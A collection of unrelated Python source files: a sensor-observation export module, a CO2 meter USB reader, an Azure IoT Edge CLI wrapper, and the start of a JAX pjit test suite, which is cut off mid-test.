start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
export.py
|
#!/usr/bin/env python3.6
"""Module for the export of observations."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2017 Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import copy
import threading
import time
from enum import Enum
from pathlib import Path
from typing import Any, Dict, Union
import arrow
# import requests
from tinydb import TinyDB
from tinydb.storages import MemoryStorage
from core.manager import Manager
from core.observation import Observation
from core.prototype import Prototype
class CloudExporter(Prototype):
"""
CloudExporter sends observation data to an OpenADMS Server instance.
Observations are cached locally in case the service is temporary not
reachable and then send again. Caching can be done either in-memory or
file-based. In-memory is faster and requires less I/O operations, but
cached observations do not persist over restarts (data loss may be occur).
The JSON-based configuration for this module:
Parameters:
url: URL of the OpenADMS Server instance.
user: User name for OpenADMS Server.
password: Password for OpenADMS Server.
authMethod: Authentication method (`basic` or `jwt`).
db: File name of the cache database (e.g.: `cache.json`).
storage: Storage type (`file` or `memory`).
Example:
The configuration may be::
{
"url": "https://api.examples.com/",
"user": "test",
"password": "secret",
"authMethod": "basic",
"db": "cache.json",
"storage": "file"
}
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._url = config.get('url')
self._user = config.get('user')
self._password = config.get('password')
self._auth_method = config.get('authMethod')
self._storage = config.get('storage')
self._db_file = config.get('db')
self._jwt_token = None
self._thread = None
if self._storage not in ['file', 'memory']:
raise ValueError('Invalid storage method')
if self._storage == 'memory':
self._cache_db = TinyDB(storage=MemoryStorage)
self.logger.verbose('Created in-memory cache database')
if self._storage == 'file':
try:
self.logger.verbose(f'Opening local cache database '
f'"{self._db_file}" ...')
self._cache_db = TinyDB(self._db_file)
except Exception:
raise ValueError(f'Cache database "{self._db_file}" could not '
f'be opened')
def _cache_observation(self, obs: Observation) -> str:
"""Caches the given observation in the local cache database.
Args:
obs: Observation object.
"""
doc_id = self._cache_db.insert(obs.data)
self.logger.debug(f'Cached observation "{obs.get("name")}" of target '
f'"{obs.get("target")}" (doc id = {doc_id})')
return doc_id
def _get_cached_observation_data(self) -> Union[Dict[str, Any], None]:
""""Returns a random observation data set from the cache database.
Returns:
Observation data or None if cache is empty.
"""
if len(self._cache_db) > 0:
return self._cache_db.all()[0]
return None
def _remove_observation_data(self, doc_id: int) -> None:
"""Removes a single observations from the cache database.
Args:
doc_id: Document id.
"""
self._cache_db.remove(doc_ids=[doc_id])
self.logger.debug('Removed observation from cache database '
'(document id = {})'.format(doc_id))
def _transfer_observation_data(self, obs_data: Dict[str, Any]) -> bool:
# TODO this method is a mock
self.logger.info(f'Transferred observation "{obs_data.get("name")}" '
f'of target "{obs_data.get("target")}"')
return True
def has_cached_observation(self) -> bool:
"""Returns whether or not a cached observation exists in the database.
Returns:
True if cached observation exists, False if not.
"""
return True if len(self._cache_db) > 0 else False
def process_observation(self, obs: Observation) -> Observation:
"""Caches observation object locally.
Args:
obs: Observation object.
Returns:
The observation object.
"""
self._cache_observation(copy.deepcopy(obs))
return obs
def run(self) -> None:
"""Sends cached observation to RESTful service."""
while self.is_running:
if not self.has_cached_observation_data():
time.sleep(1.0)
continue
if len(self._cache_db) > 500:
self.logger.warning('Cache stores > 500 observations')
# Send cached observation data to OpenADMS Server.
obs_data = self._get_cached_observation_data()
is_transferred = self._transfer_observation_data(obs_data)
if is_transferred:
# Remove the transferred observation data from cache.
self._remove_observation_data(obs_data.doc_id)
def start(self) -> None:
"""Starts the module."""
if self._is_running:
return
super().start()
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
class FileRotation(Enum):
"""
Enumeration of file rotation times of flat files.
"""
NONE = 0
DAILY = 1
MONTHLY = 2
YEARLY = 3
class FileExporter(Prototype):
"""
FileExporter writes sensor data to a flat file in CSV format.
The JSON-based configuration for this module:
Parameters:
dateTimeFormat (str): Format of date and time (see `arrow` library).
fileExtension (str): Extension of the file (``.txt`` or ``.csv``).
fileName (str): File name with optional placeholders ``{{date}}``,
``{{target}}``, ``{{name}}``, ``{{port}}``.
fileRotation (str): Either ``none``, ``daily``, ``monthly``, or
``yearly``.
paths (List[str]): Paths to save files to (multiple paths possible).
separator (str): Separator between values within the CSV file.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._file_extension = config.get('fileExtension')
self._file_name = config.get('fileName')
self._file_rotation = {
'none': FileRotation.NONE,
'daily': FileRotation.DAILY,
'monthly': FileRotation.MONTHLY,
'yearly': FileRotation.YEARLY
}.get(config.get('fileRotation'))
self._date_time_format = config.get('dateTimeFormat')
self._separator = config.get('separator')
self._paths = config.get('paths')
self._save_observation_id = config.get('saveObservationId')
def process_observation(self, obs: Observation) -> Observation:
"""Appends data to a flat file in CSV format.
Args:
obs: Observation object.
Returns:
The observation object.
"""
ts = arrow.get(obs.get('timestamp', 0))
file_date = {
# No file rotation, i.e., all data is stored in a single file.
FileRotation.NONE: None,
# Every day a new file is created.
FileRotation.DAILY: ts.format('YYYY-MM-DD'),
# Every month a new file is created.
FileRotation.MONTHLY: ts.format('YYYY-MM'),
# Every year a new file is created.
FileRotation.YEARLY: ts.format('YYYY')
}[self._file_rotation]
fn = self._file_name
fn = fn.replace('{{port}}', obs.get("portName"))
fn = fn.replace('{{date}}', f'{file_date}'
if file_date else '')
fn = fn.replace('{{target}}', f'{obs.get("target")}'
if obs.get('target') is not None else '')
fn = fn.replace('{{name}}', f'{obs.get("name")}'
if obs.get('name') is not None else '')
fn += self._file_extension
for path in self._paths:
if not Path(path).exists():
self.logger.critical(f'Path "{path}" does not exist')
continue
file_path = Path(path, fn)
# Create a header if a new file has to be touched.
header = None
if not Path(file_path).is_file():
header = (f'# Target "{obs.get("target")}" of '
f'"{obs.get("sensorName")}" on '
f'"{obs.get("portName")}"\n')
# Open a file for each path.
with open(str(file_path), 'a') as fh:
# Add the header if necessary.
if header:
fh.write(header)
# Format the time stamp. For more information, see:
# http://arrow.readthedocs.io/en/latest/#tokens
date_time = ts.format(self._date_time_format)
# Create the CSV line starting with date and time.
line = date_time
if self._save_observation_id:
line += self._separator + obs.get('id')
if obs.get('target') is not None:
line += self._separator + obs.get('target')
response_sets = obs.get('responseSets')
for response_set_id in sorted(response_sets.keys()):
response_set = response_sets.get(response_set_id)
v = response_set.get('value')
u = response_set.get('unit')
line += self._separator + format(response_set_id)
line += self._separator + format(v)
line += self._separator + format(u)
# Write line to file.
fh.write(line + '\n')
self.logger.info(f'Saved observation "{obs.get("name")}" of '
f'target "{obs.get("target")}" from port '
f'"{obs.get("portName")}" to file '
f'"{str(file_path)}"')
return obs
class RealTimePublisher(Prototype):
"""
RealTimePublisher forwards incoming `Observation` objects to a list of
receivers.
The JSON-based configuration for this module:
Parameters:
receivers (List): List of modules to send the observation to.
enabled (bool): Turns processing of observations on or off.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._receivers = config.get('receivers')
self._is_enabled = config.get('enabled')
def process_observation(self, obs: Observation) -> Observation:
if not self._is_enabled:
return obs
for receiver in self._receivers:
obs_copy = copy.deepcopy(obs)
target = f'{receiver}/{obs_copy.get("target")}'
obs_copy.set('nextReceiver', 0)
obs_copy.set('receivers', [target])
self.logger.debug(f'Publishing observation '
f'"{obs_copy.get("name")}" of target '
f'"{obs_copy.get("target")}" to "{target}"')
header = Observation.get_header()
payload = obs_copy.data
self.publish(target, header, payload)
return obs
|
CO2Meter.py
|
"""
Module for reading out CO2Meter USB devices
via a hidraw device under Linux
"""
import sys
import fcntl
import threading
import weakref
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x41
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
"""
Worker thread that constantly reads from the usb device.
"""
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
_key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
_device = ""
_values = {}
_file = ""
_running = True
_callback = None
def __init__(self, device="/dev/hidraw0", callback=None):
self._device = device
self._callback = callback
self._file = open(device, "a+b", 0)
if sys.version_info >= (3,):
set_report = [0] + self._key
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
else:
set_report_str = "\x00" + "".join(chr(e) for e in self._key)
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
thread.daemon = True
thread.start()
def _read_data(self):
"""
Function that reads from the device, decodes it, validates the checksum
and adds the data to the dict _values.
Additionally calls the _callback if set
"""
try:
result = self._file.read(8)
if sys.version_info >= (3,):
data = list(result)
else:
data = list(ord(e) for e in result)
if data[4] != 0x0d:
""" newer devices don't encrypt the data, if byte 4!=0x0d assume encrypted data """
data = self._decrypt(data)
if data[4] != 0x0d or (sum(data[:3]) & 0xff) != data[3]:
print(self._hd(data), "Checksum error")
return
operation = data[0]
val = data[1] << 8 | data[2]
self._values[operation] = self._convert_value(operation, val)
if self._callback is not None:
if operation in {CO2METER_CO2, CO2METER_TEMP} or (operation == CO2METER_HUM and val != 0):
self._callback(sensor=operation, value=val)
except:
self._running = False
def _decrypt(self, data):
"""
The received data has some weak crypto that needs to be decoded first
"""
cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]
shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
phase1 = [0] * 8
for i, j in enumerate(shuffle):
phase1[j] = data[i]
phase2 = [0] * 8
for i in range(8):
phase2[i] = phase1[i] ^ self._key[i]
phase3 = [0] * 8
for i in range(8):
phase3[i] = ((phase2[i] >> 3) | (phase2[(i - 1 + 8) % 8] << 5)) & 0xff
ctmp = [0] * 8
for i in range(8):
ctmp[i] = ((cstate[i] >> 4) | (cstate[i] << 4)) & 0xff
out = [0] * 8
for i in range(8):
out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
return out
@staticmethod
def _convert_value(sensor, value):
""" Apply Conversion of value dending on sensor type """
if sensor == CO2METER_TEMP:
return round(value / 16.0 - 273.1, 1)
if sensor == CO2METER_HUM:
return round(value / 100.0, 1)
return value
@staticmethod
def _hd(data):
""" Helper function for printing the raw data """
return " ".join("%02X" % e for e in data)
def get_co2(self):
"""
read the co2 value from _values
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_CO2 in self._values:
result = {'co2': self._values[CO2METER_CO2]}
return result
def get_temperature(self):
"""
reads the temperature from _values
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_TEMP in self._values:
result = {'temperature': self._values[CO2METER_TEMP]}
return result
def get_humidity(self): # not implemented by all devices
"""
reads the humidty from _values.
not all devices support this but might still return a value 0.
So values of 0 are discarded.
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_HUM in self._values and self._values[CO2METER_HUM] != 0:
result = {'humidity': self._values[CO2METER_HUM]}
return result
def get_data(self):
"""
get all currently available values
:returns dict with value or empty
"""
result = {}
result.update(self.get_co2())
result.update(self.get_temperature())
result.update(self.get_humidity())
return result
|
azurecli.py
|
from iotedgedev.connectionstring import IoTHubConnectionString
import json
import os
import signal
import subprocess
import sys
from io import StringIO
from threading import Thread, Timer
from azure.cli.core import get_default_cli
from fstrings import f
from queue import Empty, Queue
from . import telemetry
output_io_cls = StringIO
def get_query_argument_for_id_and_name(token):
return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token)
class AzureCli:
def __init__(self, output, envvars, cli=get_default_cli()):
self.output = output
self.envvars = envvars
self.az_cli = cli
self.process = None
self._proc_terminated = False
def decode(self, val):
return val.decode("utf-8").strip()
def is_posix(self):
return self.envvars.is_posix()
def prepare_az_cli_args(self, args, suppress_output=False):
if suppress_output:
args.extend(["--query", "\"[?n]|[0]\""])
az_args = ["az"] + args
return az_args
def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None, suppress_output=False, timeout=None):
try:
if timeout:
timeout = int(timeout)
monitor_events = False
if 'monitor-events' in args:
monitor_events = True
self._proc_terminated = False
# Consider using functools
if monitor_events:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid if self.is_posix() else None,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0)
elif stdout_io or stderr_io:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not self.is_posix())
else:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix())
self.process = process
timer = None
if timeout:
# This Timer will attempt to be accurate but its not always the case in practice
timer = Timer(float(timeout),
self._terminate_process_tree,
args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)])
try:
if timer:
timer.start()
if not monitor_events:
stdout_data, stderr_data = process.communicate()
else:
return self._handle_monitor_event_process(process)
finally:
if timer:
timer.cancel()
if stderr_data and b"invalid_grant" in stderr_data:
self.output.error(self.decode(stderr_data))
self.output.info(
"Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.")
self.logout()
sys.exit()
if stdout_io and stdout_data != "":
stdout_io.writelines(self.decode(stdout_data))
if stderr_io and stderr_data != "":
stderr_io.writelines(self.decode(stderr_data))
if process.returncode != 0:
if error_message:
self.output.error(error_message)
self.output.line()
return False
if not stdout_io and not stderr_io:
self.output.line()
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
self.output.line()
return False
return True
def _enqueue_stream(self, stream, queue):
try:
while not self._proc_terminated:
queue.put(stream.readline().decode('utf8').rstrip())
finally:
stream.close()
def _handle_monitor_event_process(self, process, error_message=None):
stdout_queue = Queue()
stderr_queue = Queue()
stream_thread_map = {
'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True),
'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True)
}
stream_thread_map['stdout'].start()
stream_thread_map['stderr'].start()
try:
while not self._proc_terminated:
if not process.poll():
try:
self.output.echo(stdout_queue.get_nowait())
except Empty:
pass
else:
err = None
try:
err = stderr_queue.get_nowait()
except Empty:
pass
# Avoid empty sys.excepthook errors from underlying future
# There is already a uAMQP issue in work for this
# https://github.com/Azure/azure-uamqp-python/issues/30
if err and "sys.excepthook" not in err:
err = err.lstrip()
err = err.lstrip('ERROR:')
if error_message:
err = "{}: {}".format(error_message, err)
self.output.error(err)
return False
except KeyboardInterrupt:
self.output.info('Terminating process...')
self._terminate_process_tree()
return True
def _terminate_process_tree(self, msg=None):
try:
if self.process:
if self.is_posix():
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
else:
self.process.send_signal(signal.CTRL_BREAK_EVENT)
self.process.kill()
self._proc_terminated = True
if msg:
self.output.info(msg)
self.output.line()
return True
except Exception:
return False
def invoke_az_cli(self, args, error_message=None, stdout_io=None):
try:
exit_code = self.az_cli.invoke(args, out_file=stdout_io)
if exit_code and exit_code != 0:
if error_message:
self.output.error(error_message)
return False
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
return False
self.output.line()
return True
def add_extension(self, name):
return self.invoke_az_cli_outproc(["extension", "add", "--name", name,
"--yes"],
f("Error while adding extension {name}."), suppress_output=True)
def add_extension_with_source(self, source_url):
return self.invoke_az_cli_outproc(["extension", "add", "--source", source_url,
"--yes"],
f("Error while add extension from source {source_url}."),
suppress_output=True)
def extension_exists(self, name):
return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"],
f("Error while checking for extension {name}."), suppress_output=True)
def user_has_logged_in(self):
self.output.header("AUTHENTICATION")
self.output.status(f("Retrieving Azure CLI credentials from cache..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["account", "show"], stdout_io=io)
if result:
try:
self.output.prompt("Azure CLI credentials found.")
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
except Exception:
pass
self.output.prompt(
"Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.")
return None
def login_account(self, username, password):
return self.invoke_az_cli_outproc(["login", "-u", username,
"-p", password],
"Error while trying to login to Azure. Make sure your account credentials are correct", suppress_output=True)
def login_sp(self, username, password, tenant):
return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username,
"-p", password, "--tenant", tenant],
"Error while trying to login to Azure. Make sure your service principal credentials are correct.", suppress_output=True)
def login_interactive(self):
return self.invoke_az_cli_outproc(["login"],
"Error while trying to login to Azure.", suppress_output=True)
def logout(self):
return self.invoke_az_cli_outproc(["account", "clear"])
def list_subscriptions(self):
self.output.status("Retrieving Azure Subscriptions...")
return self.invoke_az_cli_outproc(["account", "list", "--all", "--query", "[].{\"Subscription Name\":name, Id:id}", "--out", "table"],
"Error while trying to list Azure subscriptions.")
def get_default_subscription(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["account", "show"],
"Error while trying to get the default Azure subscription id.", io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
return ''
def get_subscription_id_starts_with(self, token):
with output_io_cls() as io:
query = get_query_argument_for_id_and_name(token)
result = self.invoke_az_cli_outproc(["account", "list", "--query", query],
"Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
if len(data) == 1:
return data[0]["id"]
elif len(data) > 1:
self.output.error(
"Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token))
return token
else:
self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token))
return ''
def set_subscription(self, subscription):
if len(subscription) < 36:
subscription = self.get_subscription_id_starts_with(subscription)
if len(subscription) < 36:
return subscription
if len(subscription) == 36:
self.output.status(f("Setting Subscription to '{subscription}'..."))
result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription],
"Error while trying to set Azure subscription.")
if result:
return subscription
return None
def resource_group_exists(self, name):
self.output.status(f("Checking if Resource Group '{name}' exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "exists", "-n", name],
f("Resource Group {name} does not exist."), io)
if result:
out_string = io.getvalue()
if out_string == "true":
return True
self.output.prompt(f("Resource Group {name} does not exist."))
return False
def get_resource_group_location(self, name):
self.output.status(f("Retrieving Resource Group '{name}' location..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"],
f("Could not retrieve Resource Group {name}'s location."), io)
if result:
return io.getvalue()
else:
return ''
def create_resource_group(self, name, location):
self.output.status(
f("Creating Resource Group '{name}' at '{location}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location],
f("Could not create the new Resource Group {name} at location:{location}."), io)
return result
def list_resource_groups(self):
self.output.header("RESOURCE GROUP")
self.output.status("Retrieving Resource Groups...")
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "list", "--query", "[].{\"Resource Group\":name, Location:location}", "--out", "table"], "Could not list the Resource Groups.", stdout_io=io)
self.output.prompt(io.getvalue())
self.output.line()
return result
def set_modules(self, config: str, device_id: str, connection_string: IoTHubConnectionString):
self.output.status(f"Deploying '{config}' to '{device_id}'...")
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError(f"Deployment manifest file '{config}' not found. Please run `iotedgedev build` first")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id, "-n", connection_string.iothub_host.hub_name, "-k", config, "-l", connection_string.connection_string],
error_message=f("Failed to deploy '{config}' to '{device_id}'..."), suppress_output=True)
def set_device_tag(self, connection_string: IoTHubConnectionString, device_id: str, tags: str):
self.output.status(f"Adding tag '{tags}' to '{device_id}'...")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "hub", "device-twin", "update", "-d", device_id, "-l", connection_string.connection_string, "--tags", tags],
error_message=f"Failed to add tag: '{tags}' to device '{device_id}' ...", suppress_output=True)
def create_deployment(self,
config: str,
connection_string: IoTHubConnectionString,
deployment_name: str,
target_condition: str,
priority: str) -> bool:
self.output.status(f"Deploying '{config}' to '{connection_string.iothub_host.hub_name}'...")
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError(f"Deployment manifest file '{config}' not found. Please run `iotedgedev build` first")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "edge", "deployment", "create", "-d", deployment_name, "-l", connection_string.connection_string, "--content", config,
"--target-condition", target_condition, "--priority", priority],
error_message=f"Failed to deploy '{config}' to '{connection_string.iothub_host.hub_name}'...", stderr_io=io)
if io.getvalue():
self.output.error(io.getvalue())
self.output.line()
return result
def monitor_events(self, device_id, connection_string, hub_name, timeout=300):
return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name, "-l", connection_string, '-t', str(timeout), '-y'],
error_message=f("Failed to start monitoring events."), suppress_output=False, timeout=timeout)
def get_free_iothub(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "list"], f("Could not list IoT Hubs in subscription."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
for iot in data:
if iot["sku"]["name"] == "F1":
return (iot["name"], iot["resourcegroup"])
return (None, None)
def get_first_iothub(self, resource_group):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"], f("Could not get first IoT Hub."), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
return data["name"]
return ''
def list_iot_hubs(self, resource_group):
self.output.header("IOT HUB")
self.output.status(f("Retrieving IoT Hubs in '{resource_group}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not list the IoT Hubs in {resource_group}."))
def iothub_exists(self, value, resource_group):
self.output.status(
f("Checking if '{value}' IoT Hub exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value, "--resource-group",
resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} in {resource_group}."))
return result
def create_iothub(self, value, resource_group, sku):
self.output.status(
f("Creating '{value}' in '{resource_group}' with '{sku}' sku..."))
with output_io_cls() as io:
with output_io_cls() as error_io:
self.output.prompt(
"Creating IoT Hub. Please wait as this could take a few minutes to complete...")
result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value, "--resource-group",
resource_group, "--sku", sku, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."), stdout_io=io, stderr_io=error_io)
if not result and error_io.getvalue():
self.output.error(error_io.getvalue())
self.output.line()
elif io.getvalue():
self.output.prompt(io.getvalue())
self.output.line()
return result
def get_iothub_connection_string(self, value, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "connection-string", "show", "--hub-name", value,
"--resource-group", resource_group],
f("Could not create the IoT Hub {value} in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
def edge_device_exists(self, value, iothub, resource_group):
self.output.status(
f("Checking if '{value}' device exists in '{iothub}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
return result
def list_edge_devices(self, iothub):
self.output.header("EDGE DEVICE")
self.output.status(
f("Retrieving edge devices in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub,
"--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not list the edge devices in {iothub} IoT Hub."))
def create_edge_device(self, value, iothub, resource_group):
self.output.status(
f("Creating '{value}' edge device in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
def get_device_connection_string(self, value, iothub, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "connection-string", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import logging
import threading
from unittest import SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
from jax.experimental.pjit import pjit, pjit_p, with_sharding_constraint, SpecSync
from jax.interpreters import pxla
from jax.interpreters import xla
from jax.lib import xla_client
from jax._src.util import prod, curry
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
